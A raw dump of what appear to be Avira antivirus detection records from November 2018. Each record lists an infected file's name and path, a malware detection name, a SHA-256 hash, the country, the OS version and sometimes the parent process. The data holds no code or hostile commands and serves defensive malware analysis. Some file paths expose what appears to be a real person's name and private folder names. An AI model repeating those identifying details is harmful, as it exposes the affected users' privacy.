  Row(detection=Row(filename='avscan-20181102-060906-c68f8523', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060906-C68F8523', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062211-9a7b9f1c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062211-9A7B9F1C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T20:38:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055926-6c7b361c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055926-6C7B361C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pktextract.exe', filepath='E:\\development kit\\Bin\\pktextract.exe', filesize=256000, name='TR/Patched.Gen.#M300.#R6433'), hash='7d3731711f8b82f4e93e5b2f8fe6148c053fee19439da82cdde28671543c9f77', metadata=Row(cmdline='\\\\\\/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=248320, timestamp='2018-11-02T23:02:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7d052a62c8aa657a311c064e86fc1ba3d7bebd35861fece30d3000429fed23d2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7D052A62C8AA657A311C064E86FC1BA3D7BEBD35861FECE30D3000429FED23D2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7d052a62c8aa657a311c064e86fc1ba3d7bebd35861fece30d3000429fed23d2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:59:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053215-a05c708c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053215-A05C708C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051240-e47297d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051240-E47297D3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055524-dc60feae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055524-DC60FEAE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062124-7e6c9435', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062124-7E6C9435', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062144-8a8099a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062144-8A8099A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:21:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053818-78cbd243', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053818-78CBD243', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051705-82406ab7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051705-82406AB7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061504-9b9ea12c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061504-9B9EA12C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052202-3328dcc5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052202-3328DCC5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062444-f548ba20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062444-F548BA20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:24:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055436-bfd3f302', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055436-BFD3F302', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fd.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\FD\\New Folder\\fd\\fd.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mshta.exe', filepath='\\\\?\\C:\\Windows\\System32\\mshta.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='1206eeadf6297fcfc9ed4ace9f1bc0bd3b8c7322e17f5fe5325a0b20da5eeca5', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:19:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9143283\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:19:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:39:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cd worship.exe', filepath='\\\\?\\D:\\CD Worship\\CD Worship.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160050-f298d612', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160050-F298D612', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='40cc00ed57e2abd3c14c47ef8c789e04c15048b53f2b179ab734bc63277c0904', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\40CC00ED57E2ABD3C14C47EF8C789E04C15048B53F2B179AB734BC63277C0904', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='40cc00ed57e2abd3c14c47ef8c789e04c15048b53f2b179ab734bc63277c0904', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160234-042f138a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160234-042F138A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optprostart.exe', filepath='C:\\Program Files (x86)\\Optimizer Pro\\OptProStart.exe', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:40:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sosialisasi perubahan upah.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO SOSIALISASI PERUBAHAN UPAH\\SOSIALISASI PERUBAHAN UPAH.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155943-e76b8e55', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155943-E76B8E55', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-184221-a53e7c9f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-184120-9C2ABE8B\\AVSCAN-20181101-184221-A53E7C9F', filesize=64000, name='VBA/Dldr.Agent.nwhnf.#M1.#R1'), hash='4a49ca27de47c4b04faa416e2d8d64bc1a4ed73782e75d527c1ad2bfe9980e7d', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:42:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccuaiuabasicstubserver.exe', filepath='C:\\Program Files\\Common Files\\Siemens\\ace\\bin\\CCUAIUABasicStubServer.exe', filesize=200000, name='W32/Sality.AG.#M1.#R1'), hash='151cbe1c8d8bbcd6faaa3105c13ea3e6d0ad0cf556db1bf95906acafd6647232', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T11:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160324-0c9c2a58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160324-0C9C2A58', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:03:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T22:44:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe472_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe472 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T10:20:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:27:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R2947'), hash='0de2186f822b93d071a20fe2c6b0ab283b0d6c90f1c280e34ab915fca0cb8028', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T07:35:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='23 versi english.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\AUDIT\\Suggestion Corrective Action\\GSM\\GSM VERSI ENGLISH\\NC 23 versi English\\23 versi English.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='กล้องโรงเรียน.exe', filepath='E:\\picture\\กล้องโรงเรียน\\กล้องโรงเรียน.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='3ad0facb991f342aff925aa8a1a60376eb55b63d0a79ffdfc88ff7951999ccb5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:15:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154459-528179ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-154459-528179ED', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:45:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111138-ff9f4f1d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111138-FF9F4F1D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:11:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-120317-6200263a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be41d322\\AVSCAN-20181101-115845-2C445F3B\\AVSCAN-20181101-120317-6200263A', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T04:56:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-5.available\\Avira\\94B00E30C8968AABD833CC71544A955F1D5CBFC2D1A4FDCDC38E06FBD3D94FA5', filesize=176000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='94b00e30c8968aabd833cc71544a955f1d5cbfc2d1a4fdcdc38e06fbd3d94fa5', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T11:31:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-041253-ae70e4ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e0b231b2\\AVSCAN-20181101-041234-AB21E5DC\\AVSCAN-20181101-041253-AE70E4FF', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T12:00:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-101302-da0762ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7b9cd4a6\\AVSCAN-20181101-101238-D512283C\\AVSCAN-20181101-101302-DA0762FF', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:13:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='downloads.exe', filepath='C:\\Users\\X\\Downloads\\Downloads.exe', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe9_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe9 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T02:31:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-082017-af6218f0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d15830c6\\AVSCAN-20181101-081149-80057893\\AVSCAN-20181101-082017-AF6218F0', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='a991124ffdc61b97ef1548bab089a7c63a32316067441dda960b67ab61acaa4a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='a20688424a12cbc0891b11f0a688a393e33b7c7cd2d6311730c93e9e6ff85380', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsr18AA.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=8455960, timestamp='2018-11-01T20:16:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141534-fc9ba38d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3c714bc1\\AVSCAN-20181101-141439-F503CA1A\\AVSCAN-20181101-141534-FC9BA38D', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T07:15:08Z'), dt=datetime.date(2018, 11, 1)),
